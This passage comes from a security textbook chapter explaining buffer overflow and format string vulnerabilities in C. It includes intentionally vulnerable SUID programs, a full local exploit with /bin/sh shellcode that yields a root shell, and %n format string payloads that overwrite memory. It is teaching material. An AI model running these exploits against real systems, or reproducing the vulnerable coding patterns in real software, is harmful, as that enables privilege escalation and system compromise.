Building Open Source Network Security Tools: Components and Techniques [Electronic resources] (text version)

Vulnerability Testing

Vulnerability testing is the process of actively exploiting a weakness in a system to confirm that the system is susceptible to it. Sometimes considered the technique of malcontents, vulnerability testing is widely used by security professionals for proof-of-concept testing or during consulting engagements or directed research. In the wrong hands, however, vulnerability testing (often simply called exploiting) can be a powerful and dangerous technique. Consider a serious security flaw in software that is widely deployed across the Internet. Couple that with a tool that exploits this flaw to yield privileged access, and the potential for shenanigans is high.

Tools employing this technique (exploits) tend to be small and tailored to a specific vulnerability or class of vulnerabilities. Often, developers write them to target one particular vulnerability on a particular architecture (as is the case with buffer overflow and format string exploits). While we do not mean for this section to be a cookbook for how to write exploit code, we describe two common methods of exploitation: traditional buffer overflows and format string attacks.

The Programmer's Stack

Both of the vulnerability testing methods covered here deal intimately with the stack, so we describe it briefly first.

A stack is an abstract data type that almost every modern computer system employs. Also known as a last in, first out (LIFO) queue, the stack is a central component in today's high-level programming languages (such as C). Arguably the most important technique for building programs with high-level languages is the function call. When a function call occurs, the flow of control of a program alters as it moves to the function's address to execute the function's code, and then control returns to the location immediately after the function call. The system accomplishes this with a stack. The stack also holds the local variables used in functions, passes parameters to the functions, and returns values from the function to the caller. For example, the arguments to a function and the return address are pushed onto the stack when the function is called and then popped back off the stack when returning from it in order to restore the program's state. We will see how certain programming flaws enable attackers to manipulate values on the stack to cause exceptional events to occur.

Architectural Specificity

As most application programmers know, the x86 stack grows downward from high memory addresses to low memory addresses. Not so well known, however, is the fact that some operating systems provide functionality to pad the stackframe for each new process with a random number of bytes. The following code snippet shows OpenBSD's algorithm for performing this task on little-endian machines:


stackgap_random = 1024;
sgap = 512;
sgap += (arc4random() * (sizeof(int) - 1)) & (stackgap_random - 1);

Because buffer overflow and format string exploits rely on knowing the stack pointer address, this randomization process frustrates attack and penetration-based tools that utilize these methods. As such, except where noted, the following examples are built and compiled on an OpenBSD kernel with random stackgap padding disabled.

Buffer Overflow Vulnerabilities

Considered to be the hallmark of poor programming, a program susceptible to a buffer overflow enables the attacker to control the flow of the afflicted software and often to seize complete control of the program. A buffer overflow, simply put, is the act of filling a contiguous buffer past its predefined boundaries. Consider the following sample program (which we assume to be built and installed SUID root):


#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
int
main(int argc, char **argv)
{
    char buf[512];

    setuid(0);
    seteuid(0);
    /* not vulnerable to a buffer overflow attack */
    strncpy(buf, argv[1], 512);
    printf("Completed strncpy().\n");
    /* vulnerable to a buffer overflow attack */
    strcpy(buf, argv[1]);
    printf("Completed strcpy().\n");
    return (0);
}

This code shows both the right way and the wrong way to handle strings. To the untrained eye, it appears that the code is completely functional and that the two blocks of code are equivalent, but the programmer introduced a fatal flaw in the second set of statements. When the program is compiled and executed under normal circumstances, both pairs of statements run correctly:


tradecraft: ~> ./overflow1 "sup dorks"
Completed strncpy().
Completed strcpy().

As expected, the process flow of both segments is identical. If argv[1] is much larger than 512 bytes, however, the program does not behave as expected. Consider the following invocation:


tradecraft: ~> ./overflow1 `perl -e 'print "X"x1000'`
Completed strncpy().
Segmentation fault (core dumped)

The first statement completed successfully while the second one seemed to cause a memory segmentation fault. To understand why, and to know why this situation can be a security liability, we need to understand a little bit more about our programming language and environment.

Why C Makes Buffer Overflows Possible

The C programming language, by modern programming standards, is actually a rather low-level language. The function calls that the programmer utilizes often compile down into only a handful of mnemonic machine code instructions. One can argue that the main reason why C has remained so popular for three decades is the power and flexibility that such low-level behavior provides. For example, rather than creating a string variable type for the C language, the language designers and maintainers require the programmer to create an array of characters (which are a single byte each on most platforms) for use with text. It becomes the responsibility of the programmer to allocate, manage, and free the memory needed for a string.

If a programmer attempts to write a block of data that is larger than the target character array, as in our previous example, the compiled language itself does not cry foul. Instead, the code instructs the system to complete the operation and complete the data write. Several scenarios might occur after the function call. If only a small amount of data is written outside the allocated space, the program might continue as if no anomalous behavior occurred. If other variables occupy the neighboring space in the memory structure, known as the heap, it is possible that the newly written data will overwrite information in the neighboring space (referred to as a heap overflow; we do not cover this topic in depth here). In many cases, the program halts with a segmentation fault (as seen earlier) or a signal from the operating system that the process is attempting to access memory that it has not allocated.

We devote this section to the outcome of the final scenario. If enough data is written to the buffer, the resulting overflow can infringe upon the memory space utilized by the processor for program flow and local variable storage (also known as the stack). If any of the information in the stack is corrupted, such as the saved instruction pointer that tells the processor where to resume after the current function returns, it is almost certain that the program will terminate in a crash.

Creative individuals, however, have found a way to exploit this shortcoming in the handling of strings. It is possible to overflow a buffer in such a way as to insert a new value for the instruction pointer utilized by the processor upon return from the current function being executed. A clever system attacker could fool the processor into thinking that data introduced by the attacker into the program's memory is legitimate, executable code. In many cases, because the program runs with the same permissions as the user who is calling the process, this technique is of little use to an attacker. When the process is run as root to enable access to the privileged ports, or when the program is accessible to local users and is set to run as root regardless of the user executing the process, the security of the system can be compromised. Because the injected code runs with the same permissions as the process itself, a malicious user can have a root process execute arbitrary code. This situation is obviously bad.

A Sample Overflow

Next, we have a sample buffer overflow program that is capable of breaking the overflow1 program that we presented earlier:


#include <stdio.h>
#include <string.h>
#include <stdlib.h>

The following function places the address of the current stack pointer in a register that is used for returning the results of function calls. When the get_esp() call returns, this value also returns to the calling function:


/* find out where we are in the current memory space */
unsigned long get_esp(void) {
    /* copy the stack pointer into %eax, the x86 return-value register */
    __asm__("movl %esp,%eax");
}

The following sequence of assembly instructions lies at the heart of the buffer overflow attack. The chain of machine codes instructs the processor to place the system call number in the first register, a pointer to the address of the string "/bin/sh" in the second register, the address to the string "/bin/sh" in the third register, and NULL in the fourth register. Next, the processor is interrupted to execute the program. Upon return, the malicious code graciously informs the processor that the instruction set completed successfully:


/* Our shellcode:
* Assembly language for "launch a shell" and "exit cleanly".
* This includes code to produce NULLs through XORs and switch to
* relative addressing using an unreturned CALL.
* This shellcode is written for Linux/x86.
*/
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
    char *egg;
    long retaddr;
    int eggsize, offset, i;

    /* Provide some basic help to the user */
    if (argc != 3)
    {
        printf("Usage:\n");
        printf("\tbreak [eggsize] [offset]\n");
        printf("\tvulnprog $EGG\n");
        return (EXIT_FAILURE);
    }
    /* convert values passed to us by the user to integers */
    eggsize = atoi(argv[1]);
    offset = atoi(argv[2]);

Here, memory is allocated to build the attack code, which we often refer to as an "egg":



    if ((egg = (char *)malloc(eggsize)) == NULL)
    {
        perror("malloc");
        return (EXIT_FAILURE);
    }

A call to get_esp() grabs the current location of the stack in memory and also enables the user to subtract an arbitrary offset from this value. Careful adjustment of this offset often means the difference between a functional and non-functional overflow attack:


    /* get return address */
    retaddr = get_esp() - offset;

In order to increase the chances of successfully inserting the arbitrary return address into the correct position on the stack (and therefore successfully exploiting the overflow), the entire egg fills with the target address:


    /* fill the entire array with the targeted return address. */
    for (i = 0; i < (eggsize / 4); i++)
    {
        *((long *)egg + i) = retaddr;
    }

The return addresses, which were placed in the first half of the egg earlier, are now replaced with dummy instructions. These "No Operation" (or NOPs for short) form a "landing pad" for the return address. If the return address ends up landing anywhere in the middle of the field of NOPs, the processor processes these nominally and increments until it hits the shell code segment (which has yet to be inserted):


    /* set up NOP ramp */
    for (i = 0; i < eggsize / 2; i++)
    {
        *(egg + i) = 0x90;
    }

The program then copies the shell code created earlier into the middle of the egg, placing it directly between the NOPs and the return address segment. It caps it off with a NULL terminator (remember that this shell code needs to be treated as a string):


    /* put our target shell code right smack in the middle */
    for (i = 0; i < (int)strlen(shellcode); i++)
    {
        *(egg + i + (eggsize / 2) - (strlen(shellcode) / 2)) = shellcode[i];
    }
    /* cap the end of the array with a NULL */
    egg[eggsize - 1] = '\0';
    /* drop the whole thing into an environmental variable */
    memcpy(egg, "EGG=", 4);
    putenv(egg);
    /* perform a sanity check of what was built */
    printf("Eggsize/Offset: %i/%i\n", eggsize, offset);
    printf("Retaddr: 0x%lx\n", retaddr);
    printf("Egg: ");
    for (i = 0; i < eggsize; i++)
    {
        printf("%x", egg[i]);
    }
    printf("\n");
    /* spawn a shell, and away we go! */
    system("/bin/bash");

The egg is now in place in the environment of the newly spawned shell. All that is required now is to execute the vulnerable program with the environmental variable $EGG as an argument:


    return (EXIT_SUCCESS);
}

It is up to the user to determine the correct egg size. In general, the egg has to be large enough to fully overwrite the target buffer and intrude into the stack far enough to replace the old instruction pointer with the new return address. Because the size of our target buffer is already known (512 bytes), it is a fair guess that the egg should be at least 600 bytes deep. Again, due to the numerous copies of the return address that exist in the tail of the egg, the user has quite a bit of leeway in defining the egg size.

The offset provides the user with another degree of freedom in the overflow attempt by enabling precise control of the return address. It might be the case that the NOP ramp does not begin at the return address extracted from the current stack pointer. By providing an offset address on the command line, the user can bump down the return address, safely placing it in the range of the NOP ramp at the beginning of the egg.

In the following section, you can find a sample invocation of the software. We omitted a complete dump of the shell code for the sake of brevity.


tradecraft: ~# ./break 600 0
Eggsize/Offset: 600/0
Retaddr: 0xbffff128
tradecraft: ~# ./overflow1 $EGG
Completed strncpy().
Completed strcpy().
Segmentation fault (core dumped)

Here, we see an unsuccessful attempt at overflowing the buffer and changing the old instruction pointer to our target return address. Another attempt at increasing our egg size by 100 bytes is as follows:


tradecraft: ~>./break 700 0
Eggsize/Offset: 700/0
Retaddr: 0xbffff888
tradecraft: ~>./overflow1 $EGG
Completed strncpy().
Completed strcpy().
sh-2.04# id
uid=0(root) gid=1001(route) groups=1001(route)

The creation of an instance of /bin/sh indicates that the exploit of the overflow condition was successful. Because the overflow1 binary was configured to run with root privileges, the user executing the overflow has complete control over the system.

Over the past decade, the security community has weathered hundreds of vulnerabilities in major operating system components due to buffer overflow issues. Because the discovery and attack process for these programming errors has practically become algorithmic for most exploit writers, buffer overflow-style attacks are one of the chief system security concerns. Unlike DoS-style attacks such as SYN floods, or rapid virus propagation, buffer overflow attacks go largely unreported by the media, yet they continue to crop up (even in modern code implementations).

Format String Vulnerabilities

Format string vulnerabilities, like buffer overflows, are programming flaws that enable the attacker to potentially control the afflicted software. Also, like buffer overflows, format string vulnerabilities tend to crop up whenever arbitrary user input is allowed into a program. Any program that (improperly) handles input from an external source can be vulnerable to these attacks. Consider the following short program:


#include <stdio.h>
int
main(int argc, char **argv)
{
    /* not vulnerable to a format string attack */
    printf("%s", argv[1]);
    printf("\n");
    /* vulnerable to a format string attack */
    printf(argv[1]);
    printf("\n");
    return (0);
}

To the casual programmer, the two printf() statements that print argv[1] appear equivalent. Sure, the programmer took a shortcut in the second one and, rather than specifying a format string as in the first function call, passed the string to be printed directly to the function. Indeed, both statements accomplish the same thing, right? The answer is yes and no. When the program is compiled and executed, under normal circumstances both statements do the same thing:


tradecraft: ~# ./fmt1 "handsome devil"
handsome devil
handsome devil

As expected, the output from both statements is identical. printf(), however, has considerably more functionality built into it than simple screen output. Consider the following invocation:


tradecraft: ~# ./fmt1 "%x %x %x %x"
%x %x %x %x
dfbfd668 dfbfd5b4 17ab 0

This result is obviously not expected. The first statement displayed the string as entered at the command line while the second statement output something entirely different. To understand what is going on and to understand why it is a security flaw, we first need to understand format strings.

What Is a Format String?

A format string is a programming primitive employed with the printf() family of functions and is used to dictate the formatting of an arbitrary character string. Examples of format specifiers appear in Table 10.1.

Table 10.1: Format Specifiers
FORMAT	MEANING
`%d`	Interprets the argument as a signed decimal number
`%x`	Interprets the argument as an unsigned hexadecimal number
`%s`	Interprets the argument as a string
`%p`	Interprets the argument as an address (pointer)
`%n`	Stores the number of characters output so far (everything before this specifier) in the integer that the argument points to

Another short program containing a typical format string is as follows:


#include <stdio.h>
int
main(int argc, char **argv)
{
    int n, m;

    n = 10;
    printf("The variable n is %d and lives at %p.%n\n", n, &n, &m);
    printf("The above line is %d characters.\n", m);
    return (0);
}

This program, when executed, produces the following output:


tradecraft: ~# ./fmt2
The variable n is 10 and lives at 0xdfbfd190.
The above line is 45 characters.

As format specifiers are encountered within a format string, a variable number of arguments are retrieved from the stack and processed accordingly. In this example, the printf() function scans the format string and first encounters the %d format specifier. It pulls the first four bytes from the stack, which happen to be the value of n, and formats them as an integer. printf() then reads the next format specifier, %p, pulls the next four bytes from the stack (the address of n), and formats them as a pointer. Finally, the first printf() statement reads the %n format specifier and writes the number of bytes output so far to the address specified by the next four bytes on the stack, which point to the variable m. The second printf() statement prints out the number of characters output by the first statement.

By printing out these values stored on the stack, an attacker can peek into the memory of the program. Also possible, as we will see, is the ability to write arbitrary values to the stack.

A Sample Format String Attack

To illustrate and frame these points better, we consider the next program that contains a format string vulnerability:


#include <stdio.h>
#include <string.h>
int
main(int argc, char **argv)
{
    char buf[100];
    int n;

    n = 1;
    /* read input from command line and NULL terminate;
     * passing argv[1] as the format string is the flaw */
    snprintf(buf, sizeof(buf), argv[1]);
    buf[sizeof(buf) - 1] = 0;
    printf("\n%d byte buffer: %s\n", (int)strlen(buf), buf);
    printf("The variable n is %d and lives at %p.\n", n, &n);
    return (0);
}

We invoke this program with a simple string:


tradecraft: ~# ./fmt3 "hello world"
11 byte buffer: hello world
The variable n is 1 and lives at 0xdfbfd220.

Nothing is out of the ordinary about this invocation. The string was formatted and output, as was the local variable n. When we invoke the program with a string consisting of five %x format specifiers, however, much as in the first example, the story is a bit more compelling:


tradecraft: ~# ./fmt3 "%x %x %x %x %x"
29 byte buffer: 17eb dfbfdb40 40002064 2074 1
The variable n is 1 and lives at 0xdfbfdb20.

The five values that are output are the next five arguments on the stack immediately following the format string "%x %x %x %x %x": the local variable n and 16 bytes of data formatted as four 4-byte integers taken from the buf variable. This situation happens because snprintf() interprets the argument passed in by the user as a format string. snprintf() then expects that immediately following the format string in memory, there will be five integers to format as hexadecimal values into this string. Because these values are not supplied, it pulls the next 20 bytes from the stack, which happen to be variable n and 16 bytes from buf. This situation is what happened in the first example, too.

The crux of this attack is the realization that the arbitrary values entered at the command line and stored in the buffer can also end up being used as arguments to snprintf(). Consider the following invocation:


tradecraft: ~# ./fmt3 "XXXX %x %x %x %x %x %x %x"
45 byte buffer: XXXX 17eb dfbfd108 40002064 2074 1 1 58585858
The variable n is 1 and lives at 0xdfbfd0e8.

Here, we see that the four X characters supplied at the command line were copied to the beginning of buf and interpreted by snprintf() as a hexadecimal argument (an X is 0x58 when encoded in ASCII).

Finally, we use this information to modify values stored in our program. Consider the following example, which uses Perl to judiciously place a hexadecimal address in the format string:


tradecraft: ~# perl -e 'system "./fmt3",
"\x1c\xdb\xbf\xdf%x%x%x%x%x%d%n" '
30 byte buffer: - ??17ebdfbfdb3c40002064207411
The variable n is 30 and lives at 0xdfbfdb1c.

By specifying this format string in the program, we changed the value of n. In effect, the function call to snprintf() looks something like the following:


snprintf(buf, sizeof (buf),
"\x1c\xdb\xbf\xdf%x%x%x%x%x%d%n",
<20 bytes of data from the stack>,
n,
0xdfbfdb1c);

First, snprintf() copies the initial 4 bytes of the format string into buf. Next, it scans the five %x format specifiers, pulls 20 bytes from the stack, and writes them into buf as hexadecimal integers. Next, snprintf() formats and prints the value of n into buf. Finally, snprintf() reaches the %n specifier (which tells it to read the next 4 bytes as an address and write the number of characters output thus far as an integer to this address, which just so happens to point to n). It is no accident that snprintf() writes this value to n; we specified n's address at the beginning of our format string.

The output from the printf() statement looks garbled because we formatted unprintable characters into our buffer.

In order to change the value of n to other values, we can pad the format string as such:


tradecraft: ~# perl -e 'system "./fmt3",
"\x1c\xdb\xbf\xdf%x%x%x%x%x %d%n" '
32 byte buffer: - ?17ebdfbfdb3c4000206420741       1
The variable n is 32 and lives at 0xdfbfdb1c.

But in order to write values to n that are larger than the upper limit of buf (it is constrained to holding 100 characters), we employ a precision specifier, which pads the number with leading zeros:


tradecraft: ~# perl -e 'system "./fmt3",
"\x1c\xdb\xbf\xdf%x%x%x%x%x%.99d%n" '
99 byte buffer: ?Ä ?17ebdfbfdb3c4000206420741000000000000000000000000000
0000000000000000000000000000000000000000000
The variable n is 129 and lives at 0xdfbfdb1c.

Recall that %n stores the number of characters that should have been output. Although buf can hold only 100 characters, the %n format specifier still records 129.

To write the value 0 to n, we shift the address that we are writing to by 3 bytes:


tradecraft: ~# perl -e 'system "./fmt3",
"\x19\xdb\xbf\xdf%x%x%x%x%x%d%n" '
30 byte buffer: -- ?17ebdfbfdb3c40002064207411
The variable n is 0 and lives at 0xdfbfdb1c.

This process works because the value written, 30, is represented as a 4-byte little-endian integer: 0x1e 0x00 0x00 0x00. We end up performing an unaligned write (which fails on processors that have stricter alignment restrictions, such as SPARC) whose final 0x00 byte lands on the low-order byte of n. A side effect of this write is that we also overwrite the 3 bytes just below n (one with 0x1e and two with 0x00), which might or might not cause complications.

The security implications of format string attacks come into play when they are extended to overwrite a stored UID variable that will be restored or to overwrite a function's return address to return to a buffer containing user-defined shell code.

Format string vulnerabilities are still relatively new to the security scene. While they have existed since code was first penned, only recently have they been discovered and brought to light. Since then, the floodgates have opened and all sorts of programs have been found vulnerable. Like buffer overflows, the solution to the problem here is education. Once programmers stop making coding mistakes, the vulnerabilities go away.
